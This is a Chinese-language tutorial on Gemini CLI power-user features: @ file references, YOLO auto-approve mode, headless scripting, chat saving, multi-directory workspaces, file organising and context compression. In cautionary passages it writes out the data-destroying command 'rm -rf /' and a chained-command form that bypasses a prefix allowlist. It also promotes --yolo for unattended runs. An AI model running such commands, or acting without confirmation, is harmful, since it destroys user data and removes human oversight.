总之，Gemini CLI 可以超越您的本地文件系统。无论是 Google Docs、Sheets、Drive 还是其他外部内容，您都可以通过引用拉取数据。这个专业技巧节省了您手动复制粘贴的时间，并保持上下文流程自然——只需引用您需要的文档或数据集，让 AI 抓取所需的内容。它使 Gemini CLI 成为您有权访问的所有信息的真正知识助手，而不仅仅是磁盘上的文件。

（注意：访问私人文档当然需要 CLI 拥有适当的权限。始终确保任何集成都尊重安全性和隐私。在公司环境中，设置此类集成可能涉及额外的身份验证步骤。）

技巧7：使用 `@` 引用文件和图像以提供明确的上下文

快速使用场景： 不要口头描述文件内容或图像，只需直接将 Gemini CLI 指向它。使用 @ 语法，您可以将文件、目录或图像附加到提示中。这保证 AI 精确地看到这些文件中的内容作为上下文。例如：

Explain this code to me: @./src/main.js

这将在提示中包含 src/main.js 的内容（在 Gemini 的上下文大小限制内），因此 AI 可以读取并解释它。

这个 @ 文件引用是 Gemini CLI 对开发者最强大的功能之一。它消除了歧义——您不是要求模型依赖记忆或猜测文件内容，您确实将文件交给它读取。您可以将此用于源代码、文本文档、日志等。类似地，您可以引用整个目录：

Refactor the code in @./utils/ to use async/await.

通过附加以斜杠结尾的路径，Gemini CLI 将递归地包含该目录中的文件（在合理范围内，尊重忽略文件和大小限制）。这对于多文件重构或分析非常有用，因为 AI 可以一起考虑所有相关模块。

更令人印象深刻的是，您可以在提示中引用二进制文件如图像。Gemini CLI（使用 Gemini 模型的多模态能力）可以理解图像。例如：

Describe what you see in this screenshot: @./design/mockup.png

图像将被输入到模型中，AI 可能会回应类似”这是一个登录页面，有蓝色登录按钮和头部图像”等。您可以想象各种用途：审查 UI 模型、整理照片（如我们将在后面的技巧中看到的），或从图像中提取文本（Gemini 也可以进行 OCR）。

关于有效使用 @ 引用的几个注意事项：

文件限制： Gemini 2.5 Pro 拥有巨大的上下文窗口（最多 100 万个token），所以您可以包含相当大的文件或许多文件。但是，非常大的文件可能会被截断。如果文件巨大（例如数十万行），请考虑对其进行摘要或分解成多个部分。如果引用过大或由于大小而跳过了某些内容，Gemini CLI 会警告您。
自动忽略： 默认情况下，Gemini CLI 在拉取目录上下文时尊重您的 .gitignore 和 .geminiignore 文件。因此，如果您 @./ 项目根目录，它不会将巨大的忽略文件夹（如 node_modules）倾倒到提示中。您可以使用 .geminiignore 自定义忽略模式，类似于 .gitignore 的工作方式。
显式与隐式上下文： Taylor Mullen（Gemini CLI 的创造者）强调使用 @ 进行显式上下文注入，而不是依赖模型的记忆或自己总结事情。它更精确，确保 AI 不会产生幻觉内容。尽可能，使用 @ 引用将 AI 指向真实来源（代码、配置文件、文档）。这种做法可以显著提高准确性。
链式引用： 您可以在一个提示中包含多个文件，如：

Compare @./foo.py and @./bar.py and tell me differences.

CLI 将包含两个文件。只需注意令牌限制；多个大文件可能会消耗大量上下文窗口。

使用 @ 本质上是您动态向 Gemini CLI 输送知识的方式。它将 CLI 变成可以处理文本和图像的多模态阅读器。作为专业用户，养成利用这个功能的习惯——它通常比要求 AI 执行诸如”打开文件 X 并执行 Y”之类的操作更快、更可靠（它可能或可能不会自行执行）。相反，您明确地给它 X 来处理。

技巧8：即时工具创建（让 Gemini 构建辅助工具）

快速使用场景： 如果手头的任务会受益于小型脚本或实用程序，您可以要求 Gemini CLI 在您的会话中为您创建该工具。例如，您可能会说，”编写一个 Python 脚本来解析此文件夹中的所有 JSON 文件并提取错误字段。” Gemini 可以生成脚本，然后您可以通过 CLI 执行它。本质上，您可以动态扩展工具集。

Gemini CLI 不会局限于其预先存在的工具；它可以使用其编码能力在需要时制造新工具。这通常隐式发生：如果您要求复杂的东西，AI 可能建议编写临时文件（包含代码），然后运行它。作为用户，您也可以明确地指导这个过程：

创建脚本： 您可以写提示词让 Gemini 创建您选择语言的脚本或程序。它可能会使用 write_file 工具来创建文件。例如：

Generate a Node.js script that reads all '.log' files in the current directory and reports the number of lines in each.

Gemini CLI 会起草代码，并在您批准后将其写入文件（例如 script.js）。然后您可以通过使用 ! shell 命令（例如 !node script.js）或通过要求 Gemini CLI 执行它来运行它（AI 可能会自动使用 run_shell_command 来执行它刚编写的脚本，如果它认为这是计划的一部分）。

通过 MCP 实现的临时工具： 在高级场景中，AI 甚至可能建议为某些专门任务启动 MCP 服务器。例如，如果您的提示涉及一些最好在 Python 中完成的繁重文本处理，Gemini 可能会在 Python 中生成一个简单的 MCP 服务器并运行它。虽然这更少见，但它展示了 AI 可以即时设置新的”代理”。（Gemini CLI 团队的一张幻灯片幽默地提到”为一切提供 MCP 服务器，甚至一个名为 LROwn 的服务器”——暗示您可以让 Gemini 运行自己或另一个模型的实例，虽然这更多的是技巧而非实际用途！）

这里的主要好处是自动化。您无需手动停下来编写辅助脚本，而是让 AI 作为流程的一部分来完成它。就像拥有一个可以按需创建工具的助手。这对于数据转换任务、批处理操作或内置工具不直接提供的一次性计算特别有用。

细微差别和安全性： 当 Gemini CLI 为新工具编写代码时，您仍应在运行前审查它。/diff 视图（Gemini 会在您批准写入文件之前显示文件差异）是您检查代码的机会。确保它按预期执行，没有恶意或破坏性操作（除非您的提示明确要求，否则 AI 不应产生有害内容，但仍需您像对待来自 AI 的任何代码一样，仔细检查逻辑，特别是对于删除或修改大量数据的脚本）。

示例场景： 假设您有一个 CSV 文件，想以复杂方式过滤它。您要求 Gemini CLI 执行此操作，它可能会说：”我将编写一个 Python 脚本来解析 CSV 并应用过滤器。”然后它创建 filter_data.py。在您批准并运行后，您得到结果，您可能再也不需要该脚本了。这种工具的临时创建是一个专业操作——它展示了 AI 能高效自主扩展其能力。

提示： 如果您发现脚本在直接上下文之外有用，您可以将其保存为永久工具或命令。例如，如果 AI 生成了一个很棒的日志处理脚本，您可能稍后将其转换为自定义斜杠命令（技巧 #2）以便于重用。Gemini 的生成能力与扩展挂钩的结合意味着您的工具包可以在您使用 CLI 的过程中不断演进。

总之，不要让 Gemini 局限于它自带的功能上。将其视为可以即时编写新程序甚至迷你服务器来帮助解决问题的初级开发人员。这种方法体现了 Gemini CLI 的智能理念——它会弄清楚需要什么工具，即使它必须在现场编码它们。

技巧9：使用 Gemini CLI 排除系统故障或修改配置

快速使用场景： 您可以在代码项目之外运行 Gemini CLI 来帮助处理一般的系统任务——将其视为您操作系统的智能助手。例如，如果您的 shell 表现异常，您可以在主目录中打开 Gemini 并询问：”修复我的 .bashrc 文件，它有错误。” Gemini 然后可以打开并编辑您的配置文件。

这个技巧突显了Gemini CLI 不仅适用于编码项目——它是您整个开发环境的 AI 助手。许多用户使用 Gemini 来自定义他们的开发设置或修复机器上的问题：

编辑配置文件： 您可以通过引用来加载您的 shell 配置（.bashrc 或 .zshrc），然后要求 Gemini CLI 优化或故障排除它。例如，”我的 PATH 没有选择 Go 二进制文件，能编辑我的 .bashrc 来修复吗？” AI 可以插入正确的 export 行。它会在保存更改之前向您显示差异以供确认。
诊断错误： 如果您在终端或应用程序日志中遇到神秘错误，您可以复制并将其提供给 Gemini CLI。它将分析错误消息，并经常建议解决步骤。这类似于使用 StackOverflow 或 Google，但 AI 直接检查您的场景。例如：”当我运行 npm install 时，我得到 EACCES 权限错误——如何修复？” Gemini 可能检测到 node_modules 中的权限问题，并指导您更改目录所有权或使用适当的节点版本管理器。
在项目外运行： 默认情况下，如果您在没有 .gemini 上下文的目录中运行 gemini，这只是意味着没有加载项目特定的上下文——但您仍可以使用 CLI的完整功能。这对于临时任务如系统故障排除很有用。您可能没有任何代码文件需要让AI处理，但仍可以通过它运行 shell 命令或让它获取网络信息。本质上，您将 Gemini CLI 视为可以为您执行事情的 AI 驱动终端，而不仅仅是聊天。
工作站自定义： 想要更改设置或安装新工具？您可以要求 Gemini CLI，”在我的系统上安装 Docker”或”配置我的 Git 使用 GPG 签名提交。” CLI 将尝试执行步骤。它可能会从网络获取说明（使用搜索工具），然后运行适当的 shell 命令。当然，始终监视它在做什么并批准命令——但它可以通过自动化多步骤设置过程来节省时间。一个真实例子：用户要求 Gemini CLI”将我的 macOS Dock 偏好设置为自动隐藏并删除延迟”，AI 能够执行必要的 defaults write 命令。

将此模式视为将 Gemini CLI 用作智能 shell。事实上，您可以将其与技巧 16（shell 直通模式）结合——有时您可能进入 ! shell 模式来验证某些内容，然后返回 AI 模式让它分析输出。

注意事项： 进行系统级任务时，要谨慎处理有广泛影响的命令（如 rm -rf 或系统配置更改）。Gemini CLI 通常会要求确认，并且在您看到之前不会运行任何内容。但作为高级用户，您应该了解正在进行什么更改。如果不确定，请要求 Gemini 在运行前解释命令（例如，”解释 defaults write com.apple.dock autohide-delay -float 0 的作用”——如果您以这种方式提示，它会很乐意解释而不是直接执行）。

故障排除额外功能： 另一个巧妙的用途是使用 Gemini CLI 解析日志或配置文件以查找问题。例如，“扫描此 Apache 配置中的错误”（使用 @httpd.conf），或“查看昨天下午 2 点左右的 syslog 错误”（如果可访问，使用 @/var/log/syslog）。就像身边多了一位协助您的系统管理员。它甚至可以建议崩溃的可能原因或提出常见错误模式的修复方案。

总之，不要犹豫,启动 Gemini CLI 作为您环境问题的助手。它能加速您的所有工作流程——不仅仅是编写代码，还维护您编写代码的系统。许多用户报告说，在 Gemini 的帮助下自定义他们的开发环境感觉就像有一个技术伙伴随时待命，处理繁琐或复杂的设置步骤。

技巧10：YOLO 模式 - 自动批准工具操作（谨慎使用）

快速使用场景： 如果您很自信（或愿意冒险），您可以让 Gemini CLI 无需每次征求您的确认就运行工具操作。这是YOLO 模式（You Only Live Once，你只活一次）。它通过 --yolo 标志或在会话期间按 Ctrl+Y 启用。在 YOLO 模式下，一旦 AI 决定使用工具（如运行 shell 命令或写入文件），它立即执行，没有那个”批准？(y/n)”提示。

为什么使用 YOLO 模式？ 主要是为了速度和便利性，当您信任 AI 的操作时。经验丰富的用户在进行大量重复安全操作时可能会切换 YOLO 开启。例如，如果您要求 Gemini 连续生成 10 个不同文件，批准每个操作会减慢流程；YOLO 模式只会让它们全部自动写入。另一个场景是在完全自动化的脚本或 CI 管道中使用 Gemini CLI——您可以使用 --yolo 自动运行它，这样它就不会暂停确认。

要从一开始就以 YOLO 模式启动，使用以下命令启动 CLI：

gemini --yolo

或简写形式 gemini -y。您会在 CLI 中看到一些指示（如不同的提示符或通知）显示自动批准已开启。在交互式会话期间，您可以随时按 Ctrl+Y 切换它——CLI 通常会在页脚显示类似”YOLO 模式已启用（所有操作自动批准）”的消息。

重要警告： YOLO 模式强大但有风险。Gemini 团队自己将其标记为供“敢于冒险的用户”使用，意味着您应该意识到 AI 可能不经询问就执行危险命令。在正常模式下，如果 AI 决定运行 rm -rf /（最坏情况），您显然会拒绝。在 YOLO 模式下，该命令会立即运行（并可能毁掉您的一天）。虽然这种极端错误不太可能（AI 的系统提示包括安全指导方针），但确认的全部意义就是捕获任何不必要的操作。YOLO 移除了那张安全网。

YOLO 的最佳实践： 如果您想要一些便利而没有太多风险，可以考虑允许列表特定命令。例如，您可以在设置中配置某些工具或命令模式不需要确认（如允许所有 git 命令或只读操作）。事实上，Gemini CLI 支持跳过特定命令确认的配置：例如，您可以设置类似 "tools.shell.autoApprove": ["git ", "npm test"] 来始终运行那些命令。这样，您可能不需要全局 YOLO 模式——您只选择性地 YOLO 安全命令。另一种方法：使用 YOLO 时在沙箱或容器中运行 Gemini，这样即使它做了疯狂的事情，您的系统也会受到保护（Gemini 有 --sandbox 标志在 Docker 容器中运行工具）。
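
为了说明“按命令前缀放行”的含义，下面用一个小函数演示前缀匹配的判断逻辑。这只是概念示意，不代表 Gemini CLI 内部的实际实现；is_auto_approved 是为演示而起的函数名，允许列表沿用上文的 "git " 和 "npm test"。

```shell
# 演示“前缀允许列表”：命令以列表中任一前缀开头时返回 0（可自动批准），否则返回 1。
# 第一个参数是待检查的命令，其余参数是允许的前缀。
is_auto_approved() {
    cmd="$1"
    shift
    for prefix in "$@"; do
        case "$cmd" in
            "$prefix"*) return 0 ;;   # 引号内的前缀按字面匹配，* 匹配其后的任意内容
        esac
    done
    return 1
}

# 用法：
#   is_auto_approved "git status" "git " "npm test" && echo "自动批准"
#   is_auto_approved "rm -rf /"   "git " "npm test" || echo "需要确认"
```

注意前缀 "git " 末尾带空格，因此 gitk 不会被放行。另外，单纯的前缀匹配挡不住 "git status; rm -rf /" 这类拼接命令，这也是自动批准规则应当尽量保守的原因。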

许多高级用户经常切换 YOLO 开启和关闭——在进行一系列轻微文件编辑或查询时开启，在即将执行关键操作时关闭。您可以做同样的事情，使用键盘快捷键作为快速切换。

总之，YOLO 模式以监督为代价消除了摩擦。这是一个要谨慎明智使用的专业功能。它真正展示了对 AI 的信任（或鲁莽！）。如果您是 Gemini CLI 的新手，在清楚了解它倾向于做什么的模式之前，您可能应该避免 YOLO。如果您确实使用它，请加倍注意版本控制或备份——以防万一。

（如果有什么安慰的话，您并不孤单——社区中的许多人开玩笑说”我 YOLO 了，Gemini 做了些疯狂的事。”所以使用它，但是…嗯，您只活一次。）

技巧11：无头和脚本模式（在后台运行 Gemini CLI）

快速使用场景： 您可以通过以无头模式运行 Gemini CLI 来在脚本或自动化中使用它。这意味着您通过命令行参数或环境变量提供提示（甚至完整的对话），Gemini CLI 产生输出并退出。这对于与其他工具集成或在计划上触发 AI 任务很有用。

例如，要在不打开 REPL 的情况下获得一次性答案，您已经看到可以使用 gemini -p "...prompt..."。这已经是无头使用：它打印模型响应并返回到 shell。但您可以做的更多：

系统提示覆盖： 如果您想使用自定义系统角色或指令集（与默认不同）运行 Gemini CLI，可以使用环境变量 GEMINI_SYSTEM_MD。通过设置它，您告诉 Gemini CLI 忽略其内置系统提示并使用您提供的文件。例如：

export GEMINI_SYSTEM_MD="/path/to/custom_system.md"
gemini -p "Perform task X with high caution"

这将加载您的 custom_system.md 作为系统提示（AI 遵循的”角色”和规则），然后执行提示。或者，如果您设置 GEMINI_SYSTEM_MD=true，CLI 将在当前项目的 .gemini 目录中查找名为 system.md 的文件。这个功能非常高级——它基本上允许您替换 CLI 的内置大脑为您自己的指令，一些用户将其用于专门的工作流程（如模拟特定角色或执行超严格的策略）。谨慎使用它，因为替换核心提示可能会影响工具使用（核心提示包含关于 AI 如何选择和使用工具的重要指导）。

通过 CLI 的直接提示： 除了 -p，还有 -i（交互式提示），它使用初始提示启动会话，然后保持打开状态。例如：gemini -i "Hello, let's debug something" 将打开 REPL 并且已经向模型说过Hello。如果您希望在启动时立即询问第一个问题，这很有用。
使用 shell 管道脚本： 您不仅可以管道传输文本，还可以将文件或命令输出管道传输到 Gemini。例如：gemini -p "Summarize this log:" < big_log.txt 将把 big_log.txt 的内容输入到提示中（在短语“Summarize this log:”之后）。或者您可能执行 some_command | gemini -p "Given the above output, what went wrong?"。这种技术允许您将 Unix 工具与 AI 分析组合在一起。这也属于无头用法，因为它一次性执行完毕，无需交互。
在 CI/CD 中运行： 您可以将 Gemini CLI 合并到构建过程中。例如，CI 管道可能运行测试，然后使用 Gemini CLI 自动分析失败的测试输出并发布评论。使用 -p 标志和环境身份验证，这可以脚本化。（当然，确保环境有所需的 API 密钥或身份验证。）

另一个无头技巧：--format=json 标志（或配置设置）。如果您配置它，Gemini CLI 可以以 JSON 格式输出响应而不是人类可读的文本。这对于程序化消费很有用——您的脚本可以解析 JSON 并以结构化方式提取数据。

无头模式的重要性： 它将 Gemini CLI 从交互式助手转变为后端服务或实用程序，其他程序可以调用。您可以安排一个 cronjob，每晚运行一个 Gemini CLI 提示（想象生成一个报告或使用 AI 逻辑清理某些东西）。您可以将 IDE 中的按钮连接到触发无头 Gemini 运行来执行特定任务。

示例： 假设您想要一个新闻网站的每日摘要。您可以有一个脚本：

gemini -p "Web-fetch \"https://news.site/top-stories\" and extract the headlines, then write them to headlines.txt"

也可使用 --yolo，这样它就不会要求确认写入文件。这将使用网络获取工具来获取页面并使用文件写入工具保存标题。全部自动完成，无需人工干预。一旦您将 Gemini CLI 视为可脚本化组件，可能性是无穷的。

总之，无头模式将启用自动化。它是 Gemini CLI 与其他系统之间的桥梁。掌握它意味着您可以扩展您的 AI 使用——不仅仅是当您在终端中输入时，当您不在时，您的 AI 代理也可以为您工作。
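
下面是一个可以放进 cron 或 CI 脚本里的最小封装示意：把日志的最后若干行通过标准输入交给 gemini -p 做一次性分析。summarize_log 是为演示而起的函数名，提示词和默认行数也只是示例；这里假设环境中已配置好 GEMINI_API_KEY 或其他身份验证方式。

```shell
# 把日志的最后若干行交给 Gemini CLI 做一次性分析（无头模式）。
# 第一个参数是日志文件，第二个参数是要读取的行数（缺省 200）。
summarize_log() {
    log_file="$1"
    lines="${2:-200}"
    if ! command -v gemini >/dev/null 2>&1; then
        echo "未找到 gemini 命令" >&2
        return 127
    fi
    if [ ! -r "$log_file" ]; then
        echo "无法读取日志：$log_file" >&2
        return 1
    fi
    # 日志内容走标准输入，提示词通过 -p 传入
    tail -n "$lines" "$log_file" | gemini -p "Summarize this log and list likely root causes:"
}

# 用法：summarize_log /var/log/syslog 500 > summary.txt
```

只截取日志尾部是为了控制送入上下文的数据量；如果需要完整分析，可以调大行数，但要留意上下文窗口和配额的消耗。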

提示：对于真正长时间运行的非交互式任务，您还可以研究 Gemini CLI 的”Plan”模式或它如何在不干预的情况下生成多步骤计划。这些是超出此范围的高级主题。在大多数情况下，通过无头模式精心制作单个提示可以实现很多目标。

技巧12：保存和恢复聊天会话

快速使用场景： 如果您已经使用 Gemini CLI 调试了一小时需要暂停，您可以不用丢失对话上下文。使用 /chat save 保存会话。之后（即使重启 CLI），您可以使用 /chat resume 从您离开的地方继续。这样，长时间运行的对话可以暂停并无缝继续。

Gemini CLI 本质上有一个内置的聊天会话管理器。需要了解的命令有：

/chat save <tag> - 将当前对话状态保存在您提供的标签（名称）下。标签相当于该会话的文件名或键。您可以随时保存；如果标签已存在，新的保存会覆盖旧的。（使用描述性名称很有帮助，例如 /chat save fix-docker-issue。）
/chat list - 列出您所有保存的会话（您使用的标签）。这有助于您记住之前保存的名称。
/chat resume <tag> - 恢复具有该标签的会话，将整个对话上下文和历史记录恢复到保存时的状态。就像您从未离开过一样。然后您可以从那个点继续聊天。
/chat share - （保存到文件）这很有用，因为您可以将整个聊天与其他人分享，他们可以继续会话。几乎像协作一样。

在底层，这些会话很可能存储在 ~/.gemini/chats/ 或类似位置中。它们包括对话消息和任何相关状态。这个功能对于以下情况非常有用：

长时间调试会话： 有时与 AI 调试可能是一个漫长的来回过程。如果您无法一次性解决，保存它并稍后回来（也许带着清醒的头脑）。AI 仍然会”记住”之前的所有内容，因为整个上下文被重新加载。
多日任务： 如果您将 Gemini CLI 用作项目的助手，您可能有一个”重构模块 X”的聊天会话跨越多天。每天您可以恢复该特定聊天，这样上下文不会每天重置。同时，您可能将另一个”编写文档”的会话单独保存。切换上下文只是保存一个和恢复另一个的问题。
团队交接： 这更具实验性，但理论上，您可以将保存的聊天内容与同事分享（保存的文件很可能是可移植的）。如果他们将它们放在他们的 .gemini 目录中并恢复，他们可以看到相同的上下文。协作的更简单实用的方法只是从日志中复制相关的问答并使用共享的 GEMINI.md 或提示，但值得注意的是会话数据是您保留的。

使用示例：

/chat save api-upgrade

（会话保存为“api-upgrade”）

/quit

（稍后，重新打开 CLI）

$ gemini
gemini> /chat list

（显示：api-upgrade）

gemini> /chat resume api-upgrade

现在模型用上次交换的状态向您问好。您可以通过向上滚动来确认所有之前的消息都存在。

提示： 保存聊天时使用有意义的标签。不要使用 /chat save session1，给它一个与主题相关的名称（例如 /chat save memory-leak-bug）。这将帮助您稍后通过 /chat list 找到正确的那个。没有严格限制您可以保存多少会话，但偶尔清理旧会话可能是明智的。

这个功能将 Gemini CLI 变成持久的顾问。您不会丢失在对话中获得的知识；您可以随时暂停和恢复。这是与其他一些在关闭时会忘记上下文的 AI 界面的区别所在。对于高级用户来说，这意味着您可以与 AI 维护并行的工作线程。就像您为不同任务有多个终端标签页一样，您可以有多个保存的聊天会话，并在任何给定时间恢复您需要的那个。

技巧13：多目录工作区 - 一个 Gemini，多个文件夹

快速使用场景： 您的项目是否分散在多个仓库或目录中？您可以启动 Gemini CLI 同时访问所有这些，这样它会看到一个统一的工作区。例如，如果您的后端和前端是独立的文件夹，您可以同时包含这两个，这样 Gemini 可以编辑或引用两者中的文件。

有两种使用多目录模式的方式：

启动参数： 启动 Gemini CLI 时使用 --include-directories（或 -I）指定。例如：

gemini --include-directories "../backend,../frontend"

这假设您从例如 scripts 目录运行命令，并希望包含两个同级文件夹。多个路径之间用逗号分隔。然后 Gemini CLI 将所有这些目录视为一个大工作区的一部分。

保存设置： 在您的 settings.json 中，您可以定义 "includeDirectories": ["path1", "path2", ...]。如果您总是希望加载某些公共目录（例如，多个项目使用的共享库文件夹），这很有用。路径可以是相对的或绝对的。路径中的环境变量（如 ~/common-utils）是允许的。

当多目录模式激活时，CLI 的上下文和工具会考虑所有包含位置的文件。/directory show 命令将列出当前工作区中包含哪些目录。您还可以在会话期间使用 /directory add <路径> 动态添加目录，它会即时加载该目录（可能像启动时那样扫描它以获取上下文）。

为什么要使用多目录模式？ 在微服务架构或模块化代码库中，通常一部分代码存在于一个仓库中，另一部分在不同的仓库中。如果您只在一个中运行 Gemini，它不会”看到”其他的。通过组合它们，您启用跨项目推理。例如，您可以问，”更新前端中的 API 客户端以匹配后端的新 API 端点”——Gemini 可以打开后端文件夹查看 API 定义，并同时打开前端代码相应地修改它。没有多目录模式，您必须一次处理一边并手动传递信息。

示例： 假设您有 client/ 和 server/。这样启动Gemini CLI：

cd client
gemini --include-directories "../server"

现在在 gemini> 提示符下，如果您执行 !ls，您将看到它可以列出 client 和 server 中的文件（它可能将它们显示为单独的路径）。您可以执行：

Open server/routes/api.py and client/src/api.js side by side to compare function names.

AI 将可以访问两个文件。或者您可能说：

The API changed: the endpoint "/users/create" is now "/users/register". Update both backend and frontend accordingly.

它可以同时在后端路由中创建补丁并调整前端获取调用。

在底层，Gemini 合并这些目录的文件索引。如果每个目录都很大，可能会有一些性能考虑，但通常它可以很好地处理多个中小型项目。备忘单指出这有效地创建了一个具有多个根目录的工作区。

技巧： 即使您不总是使用多目录模式，要知道您仍然可以通过提示中的绝对路径（@/path/to/file）引用跨文件系统的文件。但是，没有多目录，Gemini 可能没有权限编辑这些文件或知道主动从中加载上下文。多目录正式地将它们包含在范围内，因此它了解整个集合的任务（如搜索或跨整个集合的代码生成）的所有文件。

删除目录： 如果需要，/directory remove （或类似命令）可以从工作区中删除一个目录。这不太常见，但如果您意外包含了某些东西，可以删除它。

总之，多目录模式统一您的上下文。对于 polyrepo 项目或代码分散的任何情况，这是必须的。它使 Gemini CLI 的行为更像是一个打开了整个解决方案的 IDE。作为高级用户，这意味着您的项目中没有任何部分超出了 AI 的可控范围。

技巧14：使用 AI 协助组织和清理您的文件

快速使用场景： 对凌乱的 Downloads 文件夹或无组织的项目资产感到厌倦？您可以招募 Gemini CLI 充当智能组织者。通过向它提供目录概览，它可以分类文件甚至将它们移动到子文件夹中（在您批准的情况下）。例如，”清理我的 Downloads：将图像移动到 Images 文件夹，PDF 移动到 Documents，并删除临时文件。”

因为 Gemini CLI 可以读取文件名、大小，甚至查看文件内容，它可以就文件组织做出明智的决定。一个社区创建的工具称为“Janitor AI”展示了这一点：它通过 Gemini CLI 运行，将文件分类为重要与垃圾，并相应地分组。过程涉及扫描目录，使用 Gemini 对文件名和元数据（如果需要还有内容）的推理，然后将文件移动到类别中。值得注意的是，它没有自动删除垃圾——而是将它们移动到 Trash 文件夹以供审查。

以下是如何手动使用 Gemini CLI 复制这样的工作流程：

扫描： 使用提示让 Gemini 列出文件和分类。例如：

列出当前目录中的所有文件，并将它们分类为"图像"、"视频"、"文档"、"档案"或"其他"。

Gemini 可能使用 !ls 或类似命令获取文件列表，然后分析文件名称/扩展名以对文件进行分类。

规划： 询问 Gemini 它想要如何优化。例如：

为这些文件提出新的文件夹结构。我想按类型（图像、视频、文档等）分开。同时识别任何看起来像重复或不必要的文件。

AI 可能以一个计划响应，例如：“创建文件夹：Images/、Videos/、Documents/、Archives/。将 X.png、Y.jpg 移动到 Images/；将 A.mp4 移动到 Videos/；等等。文件 temp.txt 看起来不必要（也许是一个临时文件）。”

通过确认执行移动： 然后您可以指示它执行计划。它可能为每个文件使用 mv 等shell命令。因为这会修改您的文件系统，您将获得每个操作的确认提示（除非您 YOLO 它）。仔细批准移动。完成后，您的目录将按照建议整齐地组织。

在整个过程中，Gemini 的自然语言理解是关键。例如，它可以推理出 IMG_001.png 是一个图像或 presentation.pdf 是一个文档，即使没有明确说明。它甚至可以打开图像（使用其视觉能力）查看其中的内容——例如，区分截图与照片或图标——并相应地命名或排序。

按内容重命名文件： 一个特别神奇的用途是让 Gemini 将文件重命名为更具描述性的名称。Dev Community 文章“7 Insane Gemini CLI Tips”描述了 Gemini 如何扫描图像并根据其内容自动重命名它们。例如，名为 IMG_1234.jpg 的文件如果 AI 看到它是登录屏幕的截图，可能被重命名为 login_screen.jpg。为此，您可以提示：

对于这里的每个 .png 图像，查看其内容并重命名为具有描述性的内容。

Gemini 将打开每个图像（通过视觉工具），获取描述，然后提议一个 mv IMG_1234.png login_screen.png 操作。这可以显著改善资产的组织，特别是在设计或照片文件夹中。

二次处理法： Janitor AI 讨论指出了一个两步过程：首先是广泛分类（重要与垃圾与其他），然后完善组。你可以效仿这种方法：先将可能需要删除的文件（比如大型安装程序 .dmg 文件或重复文件）与需要保留的文件分开，然后专注于整理保留的文件。一定要再次检查 AI 标记为垃圾的文件；它的判断并不总是正确，因此需要人工监督。

安全提示： 当让 AI 对文件移动或删除时，要有备份或至少准备好撤销（使用 /restore 或您自己的备份）。进行试运行是明智的：询问 Gemini 打印它将要运行以组织文件的命令，但不执行它们，这样您可以审查。例如：”列出此计划所需的 mv 和 mkdir 命令，但还不要执行它们。”一旦您审查了列表，您可以复制粘贴执行它们，或指示 Gemini 继续。
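
试运行的思路也可以手写出来对照。下面的示意脚本只打印整理计划（mkdir 和 mv 命令），不改动任何文件，可用来和 Gemini 给出的计划互相核对。plan_moves 是为演示而起的函数名，分类规则按扩展名硬编码，仅作示例；文件名中含单引号时打印出的命令需要手动调整引号。

```shell
# 只打印整理计划，不执行任何改动。
# 第一个参数是要整理的目录，缺省为当前目录。
plan_moves() {
    dir="${1:-.}"
    for path in "$dir"/*; do
        [ -f "$path" ] || continue          # 跳过子目录，也跳过目录为空时未展开的通配符
        name=$(basename "$path")
        case "$name" in
            *.png|*.jpg|*.jpeg|*.gif) dest="Images" ;;
            *.mp4|*.mov|*.mkv)        dest="Videos" ;;
            *.pdf|*.doc|*.docx|*.txt) dest="Documents" ;;
            *.zip|*.tar|*.gz)         dest="Archives" ;;
            *)                        dest="Other" ;;
        esac
        printf "mkdir -p '%s/%s' && mv '%s' '%s/%s/'\n" "$dir" "$dest" "$path" "$dir" "$dest"
    done
}

# 用法：plan_moves ~/Downloads > plan.sh   # 先审查 plan.sh，确认无误后再执行
```

把计划写入文件再执行，相当于在“规划”和“执行”之间留出一次人工审查的机会。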

这是使用 Gemini CLI 处理”非显而易见”任务的绝佳示例——它不仅仅是写代码，而是用 AI 智慧进行系统整理。它可以节省时间，为混乱的环境带来一些秩序。毕竟，作为开发者，我们都会积累各种杂乱文件（日志、旧脚本、下载文件），而一个 AI 管家会非常有用。

技巧15：压缩长对话以保持在上下文内

快速使用场景： 如果您与 Gemini CLI 聊天了很长时间，您可能会达到模型的上下文长度限制，或者只是发现会话变得难以处理。使用 /compress 命令总结到目前为止的对话，用简洁的摘要替换完整的聊天记录。这为更多讨论释放空间，而无需从头开始。

大语言模型有固定的上下文窗口（Gemini 2.5 Pro 的非常大，但不是无限的）。如果您超过它，模型可能会开始忘记较早的消息或失去连贯性。/compress 功能本质上是您会话的 AI 生成的 tl;dr，保留重要要点但删除逐分钟的对话。

它如何工作： 当您键入 /compress 时，Gemini CLI 将获取整个对话（除系统上下文外）并生成一个摘要。然后它用该摘要替换聊天记录作为单个系统或助手消息，保留基本细节但丢弃每分钟对话。它将指示发生了压缩。例如，在 /compress 之后，您可能会看到类似的内容：

— 对话压缩 —
讨论摘要：用户和助手一直在调试应用程序中的内存泄漏。关键点：问题可能在 DataProcessor.js 中，其中对象没有被释放。助手建议添加日志记录并识别可能的无限循环。用户即将测试修复。
— 摘要结束 —

从那时起，模型只有该摘要（加上新消息）作为之前发生的事情的上下文。如果摘要捕获了突出信息，这通常就足够了。

何时压缩： 理想情况下是在您遇到限制之前。如果您注意到会话变得冗长（数百回合或上下文中有很多代码），主动压缩。备忘单提到了自动压缩设置（例如，当上下文超过最大值的 60% 时压缩）。如果启用该功能，Gemini 可能自动压缩并让您知道。否则，手动 /compress 在您的工具包中。

压缩之后： 您可以正常继续对话。如果需要，您可以在非常长的会话中多次压缩。每次，您都会失去一些细节，所以不要没有理由地过于频繁压缩——您可能最终得到复杂讨论的过于简化的记忆。但通常模型自己的摘要在保留关键事实方面相当好（您可以随时重新陈述任何关键内容）。

上下文窗口示例： 假设您通过引用许多文件提供了大型代码库，并有 1M token 上下文（最大值）。如果您想要转换到项目的不同部分，而不是开始新会话（失去所有这些理解），您可以压缩。摘要将浓缩从代码中获得的知识（比如”我们加载了模块 A、B、C。A 有这些函数… B 以这些方式与 C 交互…”）。现在您可以在保留这些抽象知识的情况下继续询问新事物。

记忆与压缩： 请注意压缩不会保存到长期记忆，它对对话是局部的。如果您有想永不丢失的事实，请考虑技巧 4（添加到 /memory）——因为记忆条目将在压缩中存活（无论如何它们将被重新插入，因为它们在 GEMINI.md 上下文中）。压缩更多是关于临时聊天内容。

一个小的注意事项： 压缩之后，AI 的风格可能会略有改变，因为它实际上看到一个”全新的”带有摘要的对话。它可能会重新介绍自己或改变语气。您可以指示它如”从这里继续…（我们压缩了）”来平滑它。实际上，它通常都能很好地继续。

